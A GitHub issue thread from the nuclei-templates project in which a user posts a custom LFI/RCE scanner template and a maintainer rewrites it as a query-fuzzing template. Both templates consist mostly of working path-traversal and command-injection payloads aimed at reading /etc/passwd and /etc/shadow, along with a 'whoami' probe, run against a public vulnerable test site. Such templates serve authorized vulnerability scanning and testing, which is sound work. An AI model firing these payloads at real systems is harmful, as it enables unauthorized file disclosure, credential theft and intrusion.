### ISSUE TITLE
Template have Some problem 

### ISSUE THREAD

**Issue by shelu16** [projectdiscovery/nuclei-templates#6614]
Hi ,
  I am running a custom template 

echo http://testphp.vulnweb.com:80/AJAX/infocateg.php?id= | nuclei -t rce.yaml -stats -debug

but 
[DBG] [LFI-RCE] Dumped HTTP response http://testphp.vulnweb.com:80/AJAX/infocateg.php/../../../../../../../../etc/passwd?id=

?id= going to last after my payload 

```yaml
id: LFI-RCE

info:
  name: LFI Detection
  author: 0x240x23elu & payloadallthings
  severity: High

requests:
  - method: GET

    path:
      - "{{BaseURL}}/../../../../etc/passwd"
      - "{{BaseURL}}/../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/../../../../../../../../etc/passwd"
      - "{{BaseURL}}/../../../../../../../etc/passwd"
      - "{{BaseURL}}/../../../../../../etc/passwd"
      - "{{BaseURL}}/../../../../../etc/passwd"
      - "{{BaseURL}}/../../../../etc/passwd"
      - "{{BaseURL}}/..;/../../../../../../../../etc/passwd"
      - "{{BaseURL}}/..;/../../../../../../../etc/passwd"
      - "{{BaseURL}}/..;/../../../../../../etc/passwd"
      - "{{BaseURL}}/..;/../../../../../etc/passwd"
      - "{{BaseURL}}/..;/../../../../etc/passwd"
      - "{{BaseURL}}/..;/../../../etc/passwd"
      - "{{BaseURL}}/..;/../../etc/passwd"
      - "{{BaseURL}}/..;/../../etc/passwd"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/passwd%00"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/shadow%00"
      - "{{BaseURL}}/../../../../../../../../../../../../etc/shadow"
      - "{{BaseURL}}//../../../../../../../../../../etc/passwd^^"
      - "{{BaseURL}}//../../../../../../../../../../etc/shadow^^"
      - "{{BaseURL}}//../../../../../../../../../../etc/passwd"
      - "{{BaseURL}}//../../../../../../../../../../etc/shadow"
      - "{{BaseURL}}//./././././././././././etc/passwd"
      - "{{BaseURL}}//./././././././././././etc/shadow"
      - "{{BaseURL}}/%0a/bin/cat%20/etc/passwd"
      - "{{BaseURL}}/%0a/bin/cat%20/etc/shadow"
      - "{{BaseURL}}/%00/etc/passwd%00"
      - "{{BaseURL}}/%00/etc/shadow%00"
      - "{{BaseURL}}/%00../../../../../../etc/passwd"
      - "{{BaseURL}}/%00../../../../../../etc/shadow"
      - "{{BaseURL}}//../../../../../../../../../../../etc/passwd%00.jpg"
      - "{{BaseURL}}//../../../../../../../../../../../etc/passwd%00.html"
      - "{{BaseURL}}//..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd"
      - "{{BaseURL}}//..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow"
      - "{{BaseURL}}//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
      - "{{BaseURL}}//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow"
      - "{{BaseURL}}/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
      - "{{BaseURL}}//%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
      - "{{BaseURL}}/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%"
      - "{{BaseURL}}/\\&apos;/bin/cat%20/etc/passwd\\&apos;"
      - "{{BaseURL}}/\\&apos;/bin/cat%20/etc/shadow\\&apos;"
      - "{{BaseURL}}/cat+ ../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/cat+ ../../../../../../../../etc/passwd"
      - "{{BaseURL}}/cat+ ../../../../../../../etc/passwd"
      - "{{BaseURL}}/cat+ ../../../../../../etc/passwd"
      - "{{BaseURL}}/cat+ ../../../../../etc/passwd"
      - "{{BaseURL}}/cat+ ../../../../etc/passwd"
      - "{{BaseURL}}/whoami"
      - "{{BaseURL}}/cat ../../../../../../../../../etc/passwd"
      - "{{BaseURL}}/cat ../../../../../../../../etc/passwd"
      - "{{BaseURL}}/cat ../../../../../../../etc/passwd"
      - "{{BaseURL}}/cat ../../../../../../etc/passwd"
      - "{{BaseURL}}/cat ../../../../../etc/passwd"



    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"
```

**Comment by DhiyaneshGeek** [comment]
Hi @shelu16 Thanks for raising the issue

For this fuzzing case, it should be written as below

```yaml
id: LFI Check

info:
  name: LFI Check
  author: DhiyaneshDK
  severity: high
  tags: lfi,dast

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    payloads:
      escape:
        - "/../../../../etc/passwd"
        - "/../../../../../../../../../etc/passwd"
        - "/../../../../../../../../etc/passwd"
        - "/../../../../../../../etc/passwd"
        - "/../../../../../../etc/passwd"
        - "/../../../../../etc/passwd"
        - "/../../../../etc/passwd"
        - "/..;/../../../../../../../../etc/passwd"
        - "/..;/../../../../../../../etc/passwd"
        - "/..;/../../../../../../etc/passwd"
        - "/..;/../../../../../etc/passwd"
        - "/..;/../../../../etc/passwd"
        - "/..;/../../../etc/passwd"
        - "/..;/../../etc/passwd"
        - "/..;/../../etc/passwd"
        - "/../../../../../../../../../../../../etc/passwd%00"
        - "/../../../../../../../../../../../../etc/passwd"
        - "//../../../../../../../../../../etc/passwd^^"
        - "//../../../../../../../../../../etc/passwd"
        - "//./././././././././././etc/passwd"
        - "/%0a/bin/cat%20/etc/passwd"
        - "/%00/etc/passwd%00"
        - "/%00../../../../../../etc/passwd"
        - "//../../../../../../../../../../../etc/passwd%00.jpg"
        - "//../../../../../../../../../../../etc/passwd%00.html"
        - "//..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd"
        - "//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
        - "/\\&apos;/bin/cat%20/etc/passwd\\&apos;"
        - "/cat+ ../../../../../../../../../etc/passwd"
        - "/cat+ ../../../../../../../../etc/passwd"
        - "/cat+ ../../../../../../../etc/passwd"
        - "/cat+ ../../../../../../etc/passwd"
        - "/cat+ ../../../../../etc/passwd"
        - "/cat+ ../../../../etc/passwd"
        - "/cat ../../../../../../../../../etc/passwd"
        - "/cat ../../../../../../../../etc/passwd"
        - "/cat ../../../../../../../etc/passwd"
        - "/cat ../../../../../../etc/passwd"
        - "/cat ../../../../../etc/passwd"

    fuzzing:
      - part: query
        type: postfix
        mode: single
        fuzz:
          - "{{escape}}"

    stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'
```
